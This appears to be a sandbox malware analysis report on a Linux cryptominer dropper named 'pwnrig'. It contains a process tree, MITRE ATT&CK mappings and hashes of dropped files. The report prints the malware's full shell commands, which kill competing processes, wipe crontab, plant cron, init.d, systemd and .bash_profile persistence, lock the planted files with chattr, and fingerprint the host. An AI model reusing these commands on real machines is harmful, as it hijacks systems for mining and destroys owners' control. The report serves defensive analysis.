/usr/bin/awkawk "{print \$3}"4⤵PID:2630
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2633
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2636
-
-
/usr/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"4⤵PID:2638
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2639
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2640
-
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2641
-
-
/usr/bin/idid -u4⤵PID:2643
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2644
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:2645
-
-
/usr/bin/grepgrep -v grep4⤵PID:2646
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
PID:2648 -
/usr/bin/idid -u4⤵PID:2649
-
-
/usr/bin/psps aux4⤵
- Checks CPU configuration
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2650
-
-
/usr/bin/grepgrep -v grep4⤵PID:2651
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2652
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2653
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2654
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
PID:2661 -
/usr/bin/idid -u4⤵PID:2662
-
-
/usr/bin/psps aux4⤵
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Process Discovery
- Reads runtime system information
PID:2664
-
-
/usr/bin/grepgrep -v grep4⤵PID:2665
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵PID:2666
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2667
-
-
/usr/bin/wcwc -l4⤵PID:2668
-
-
-
-
/usr/bin/systemctlsystemctl enable dpkg-deb-package.service2⤵
- Changes its process name
PID:2657 -
/usr/bin/getoptgetopt -o r: --long root: -- enable dpkg-deb-package3⤵PID:2659
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d dpkg-deb-package defaults3⤵PID:2660
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2669
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2669
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2669
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2669
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d dpkg-deb-package enable3⤵PID:2800
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2801
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2801
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2801
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2801
-
-
-
-
/usr/bin/chattrchattr +ia /bin/dpkg-debian2⤵PID:3051
-
-
/usr/bin/crontabcrontab -r2⤵PID:3052
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
PID:3053
-
-
/usr/bin/bashbash -c "echo \"5 * * * * nohup /tmp/.klibsystem5 >/dev/null 2>&1 &\" | crontab -"2⤵PID:3054
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:3056
-
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:3057
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:3058
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:3059
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:3060
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:3061
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:3062
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:3063
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:3064
-
-
/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:3065 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:3066 -
/usr/bin/hostnamehostname -I4⤵
- Attempts to change immutable files
PID:3069
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3071
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:3073
-
-
/usr/bin/grepgrep "Port "4⤵PID:3074
-
-
/usr/bin/headhead -n 14⤵PID:3075
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:3076
-
-
/usr/bin/whoamiwhoami4⤵PID:3077
-
-
/usr/bin/hostnamehostname4⤵PID:3078
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3079
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3082
-
-
/usr/bin/cutcut -d: -f24⤵PID:3083
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3084
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3085
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3088
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3091
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3094
-
-
/usr/bin/awkawk "{print \$3}"4⤵PID:3097
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3100
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3103
-
-
/usr/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"4⤵PID:3105
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:3106
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3107
-
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:3108
-
-
/usr/bin/idid -u4⤵PID:3110
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:3111
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:3112
-
-
/usr/bin/grepgrep -v grep4⤵PID:3113
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Attempts to change immutable files
- Writes file to tmp directory
PID:3115 -
/usr/bin/idid -u4⤵PID:3116
-
-
/usr/bin/idid -u4⤵PID:3117
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3118
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:3119
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3120
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 /bin/bprofr4⤵
- Writes file to system bin folder
PID:3121
-
-
/usr/bin/idid -u4⤵PID:3122
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:3123
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:3124
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
- Attempts to change immutable files
PID:3125
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:3126
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 /bin/crondr4⤵
- Writes file to system bin folder
PID:3127
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:3129
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Attempts to change immutable files
- Creates/modifies Cron job
PID:3130
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:3131
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
PID:3132
-
-
/usr/bin/whichwhich chkconfig4⤵PID:3133
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:3134
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:3135
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵PID:3136
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3137
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3138
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3138
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3138
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3138
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:3264
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 /bin/initdr4⤵
- Writes file to system bin folder
PID:3265
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3267
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
PID:3268
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:3269
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:3270
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3271
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3271
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3271
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3271
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:3397
-
/usr/local/sbin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3398
-
-
/usr/local/bin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3398
-
-
/usr/sbin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3398
-
-
/usr/bin/systemctlsystemctl "--root=/" --quiet enable pwnrig5⤵PID:3398
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3399
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3399
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3399
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3399
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:3525
-
-
/usr/bin/whichwhich systemctl4⤵PID:3526
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:3527
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:3528
-
-
/usr/bin/cpcp -f -r -- /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 /bin/sysdr4⤵
- Writes file to system bin folder
PID:3529
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:3531
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Attempts to change immutable files
PID:3532
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
PID:3533
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵PID:3534
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:3660
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3785
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:3910
-
-
-
-
/tmp/-python37-7ce44a02-acaf-4b0b-933a-e3ee0e9c5c42/tmp/-python37-7ce44a02-acaf-4b0b-933a-e3ee0e9c5c422⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3981
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Discovery
Process Discovery
1Software Discovery
1Security Software Discovery
1System Information Discovery
3System Network Configuration Discovery
1Internet Connection Discovery
1System Network Connections Discovery
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
52B
MD54af02a573bee7aa0df7ace86e2c042e5
SHA1587c84ce4df60a533e0973c2ccf89dacc827b746
SHA256f8f4c1d9d6298d66b0c62deaa4042e1480db862b2cb8904a9414fbc200930123
SHA512425c990bb3ec0925defd88c2649099e67cf65e162f1ab61bbba1de021534bb35eee8a9fdb590b2df7fe8fbc48196007bcb549548ae2e32664aea184e0807c3bf
-
Filesize
199B
MD5906980accf4b594d289d69ab3c2b212c
SHA107d5e5111fe11aa1aaa66c61dc4a3df74b3ec6dd
SHA2562e4d6729014e1722ea4839b574d63c0e17a72a99c7ff2fd73bbb981c3429d92c
SHA512467b5bffb60506600723b0b416393853d21bfeb19986537a492716a338de4deb2cfe414e62c047798d1ad3b945d1571f1286e6d9627f823f35e7704b0d095fb0
-
Filesize
196B
MD585af470e35a1ae54466bb6d33978ad92
SHA1d3a7f7639a62dd11db91fbcf55922e29b66f1935
SHA2560940db984b9b439904954693b7d2fd4dd9b295e1cb4c440b203b2e72a3aea0ba
SHA512a2702d6157fe0f475a04ff10d0860756e1aaa7c9ee0ff05ae51ef13c7d8cb358ddc85011557e37a142ec1803e5a8551dbfc873ffa85437e5e97bfdff89c18145
-
Filesize
366B
MD5906d7ce63c7466c6c65f509156bb1529
SHA11e3dcb514ce8007a594f6805c7bdde98fe2f7667
SHA256e3d6f2b6cc53564780785e6efb9e415b83e40342fe7afe210631fe84fd492476
SHA512f488084c847b471330dbef23bbb7e3c9def2b961a66406d8ae36de9fe168f9ae1c3db3b001f8e58bd2a0dbf91696a8512812a87bb805df71972a76b82e11cd4d
-
Filesize
381B
MD531fc62b7f5d35aac493ca5162b16f812
SHA123aae8aa6388120308c0bdacb66fee7ac8e8641b
SHA2560e36d48719109e697a24e8fe2f72239109f55071ae9c603f85301029fb09271d
SHA51269e99a9aaebd79746d04cb022107a4b813e4d9a806ba55e53d6493c9b3a893156a5518117dcf8e7d6cdae3e5598a56feff2b108e5707eea85cafcaddb6b7d776
-
Filesize
362B
MD5e09c35d4415da2a376db6c6c3ca6fcf1
SHA156f9c76d37312437f411726f4e0463e14acc67fd
SHA256d852c0b7fae9a031b60d4a2521d4d7824d83570bbb49082655b63b842befd69a
SHA5127f23bfe778b3e264841f623664a578e2db37b4cfb3d99960953f715a72f984a79d5095cb51f7b65fb671828df58440bd60de06d3354887ccbff3cffb5b792d30
-
Filesize
2.3MB
MD5b9f096559e923787ebb1288c93ce2902
SHA194851bcc8f9c651bcda0ff33d17356cb0b16cf12
SHA2561fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
SHA512ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
-
Filesize
184KB
MD563a86932a5bad5da32ebd1689aa814b3
SHA1472548a4b8295182f6ba8641d74725c2250b7243
SHA2560013b356966c3d693b253cdf00c7fdf698890c9b75605be07128cac446904ad9
SHA5124631e014f77c683819ae34278625b21525d9fa0697e5376ff2babfd77af3ca609fb4a82cde2374f2c96b00dc52cdc34d7efdc40a7ee2609566a6b6e9e630f332
-
Filesize
3.2MB
MD5396a812c15bd9809d0c8f438b8517827
SHA16a8eb0ee0a05cede17a50ec04b0a549d70325dcb
SHA256d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
SHA51283ba44b59c9aa517887d27de612b646a17e1b0e372e216e279f188a75e12759b27f181509287e08e79aa34872b59b711fc8efd014b463f58934f762a8d70e948
-
Filesize
388B
MD534bba0e0c7ab1c364409fc350fa37868
SHA1a362f6eb47fa0ae5973d1d3b72a20e3c727cbd56
SHA2567d3126408366c9a8813fac8aa2e970e18e837542209c38b751bdee68c06304e1
SHA512249b8608d3a89f9e2a075a6b8164457686a256665729d7e441cafcba35567dd157eeb5123221c8ee4377993907e0100bcd55888fb94a36b557074c0df2850b26
-
Filesize
385B
MD59297e32544b3f6f52346919c3dcc4d78
SHA1a817c64117b4cba178242bf99b008c094f836c7c
SHA256fb6251a22cfb915b67202de5f89f331f18559e09438a89914271fe51018a4311
SHA5128472916e8ed3c8cc7c8db00c2dbe6c103d18406deb6f2d3b7cdba2573cc843adff36a7814997a25f134a53434b8d9c87705d0a184534dae617b2e9b385763662
-
Filesize
227B
MD5af5edc0320184d2bb02ed5e84fb548d1
SHA181e69cad0ab71c7046cf495a2970844584cf7669
SHA2563b60099bdb9c143ba616347a5f6bd1a72766dcd528676a121866ec1701ac0da9
SHA512a4e1346f54ab2894899a102867d1be79bb250e43c850bebf01a1b599b3853f0d4f4f86f7c710da40a8063cac75fe37b46bb11a303338e960f35e0a03c87be81f